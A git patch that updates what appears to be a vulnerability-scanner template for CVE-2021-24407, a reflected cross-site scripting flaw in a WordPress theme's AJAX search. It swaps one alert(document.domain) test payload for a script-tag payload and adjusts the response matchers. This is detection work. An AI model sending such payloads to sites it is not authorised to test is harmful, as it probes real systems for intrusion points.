From ac93a8acaf18fa157fb1c5f8a736a4e942d9149b Mon Sep 17 00:00:00 2001
From: Prince Chaddha <cyberbossprince@gmail.com>
Date: Thu, 16 Sep 2021 22:46:36 +0530
Subject: [PATCH] Update CVE-2021-24407.yaml

---
 cves/2021/CVE-2021-24407.yaml | 12 ++++++------
 1 file changed, 6 insertions(+), 6 deletions(-)

diff --git a/cves/2021/CVE-2021-24407.yaml b/cves/2021/CVE-2021-24407.yaml
index 8d87b74364..ddd8a322ce 100644
--- a/cves/2021/CVE-2021-24407.yaml
+++ b/cves/2021/CVE-2021-24407.yaml
@@ -8,7 +8,7 @@ info:
   reference:
     - https://wpscan.com/vulnerability/fba9f010-1202-4eea-a6f5-78865c084153
     - https://nvd.nist.gov/vuln/detail/CVE-2021-24407
-  tags: cves,cve2021,wordpress,xss
+  tags: cves,cve2021,wordpress,xss,wp-theme
 
 requests:
   - raw:
@@ -17,21 +17,21 @@ requests:
         Host: {{Hostname}}
         Accept: */*
         Content-Type: application/x-www-form-urlencoded
-        
-        action=tie_ajax_search&query[]=<svg+onload=alert(document.domain)>
+
+        action=tie_ajax_search&query[]=</script><script>alert(document.domain)</script>
 
     matchers-condition: and
     matchers:
 
       - type: word
         words:
-          - '<svg+onload=alert(document.domain)>'
+          - '</script><script>alert(document.domain)</script>'
         part: body
 
       - type: word
-        words:
-          - 'Content-Type: text/html'
         part: header
+        words:
+          - text/html
 
       - type: status
         status: